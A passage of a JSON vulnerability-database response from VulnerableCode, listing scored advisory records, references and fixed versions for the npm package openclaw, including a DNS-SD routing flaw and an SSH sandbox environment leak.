"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41337" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-callback-origin-mutation-in-plivo-voice-call-replay", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-callback-origin-mutation-in-plivo-voice-call-replay" }, { "reference_url": "https://github.com/advisories/GHSA-89r3-6x4j-v7wf", "reference_id": "GHSA-89r3-6x4j-v7wf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-89r3-6x4j-v7wf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41337", "GHSA-89r3-6x4j-v7wf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s3wz-3yzf-ybhz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91442?format=api", "vulnerability_id": "VCID-s4s8-8qea-q3fd", "summary": "OpenClaw: Bonjour/DNS-SD TXT metadata steers CLI routing after failed service resolution\n## Summary\nBonjour and DNS-SD TXT metadata could still steer CLI routing even when actual service resolution failed, allowing unresolved hints to influence the chosen target.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `deecf68b59a9b7eea978e40fd3c2fe543087b569`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/bonjour-discovery.ts now resolves and returns only concrete endpoints instead of falling back to unresolved TXT host and port hints.\n- src/cli/gateway-cli/discover.ts consumes only the fail-closed resolved endpoint path.\n\nOpenClaw thanks @nexrin for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35659", "reference_id": "", "reference_type": "", "scores": [ { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00688", "published_at": "2026-06-06T12:55:00Z" }, { "value": "7e-05", "scoring_system": "epss", "scoring_elements": "0.00687", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35659" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/deecf68b59a9b7eea978e40fd3c2fe543087b569", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/deecf68b59a9b7eea978e40fd3c2fe543087b569" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rvqr-hrcc-j9vv", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rvqr-hrcc-j9vv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35659", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35659" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unresolved-service-metadata-routing-via-bonjour-and-dns-sd-discovery", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unresolved-service-metadata-routing-via-bonjour-and-dns-sd-discovery" }, { "reference_url": "https://github.com/advisories/GHSA-rvqr-hrcc-j9vv", "reference_id": "GHSA-rvqr-hrcc-j9vv", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rvqr-hrcc-j9vv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35659", "GHSA-rvqr-hrcc-j9vv" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s4s8-8qea-q3fd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89991?format=api", "vulnerability_id": "VCID-sja9-6t41-hud8", "summary": "OpenClaw: SSH-based sandbox backends pass unsanitized process.env to child processes\n## Summary\nSSH-based sandbox backends pass unsanitized process.env to child processes\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped SSH sandbox paths leaked unsanitized env into local SSH child processes, but remote leakage needs non-default SSH env forwarding, so lower to low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `cfe14459531e002a1c61c27d97ec7dc8aecddc1f` — 2026-03-30T20:05:57+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/cfe14459531e002a1c61c27d97ec7dc8aecddc1f", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/cfe14459531e002a1c61c27d97ec7dc8aecddc1f" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j9pv-rrcj-6pfx", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": 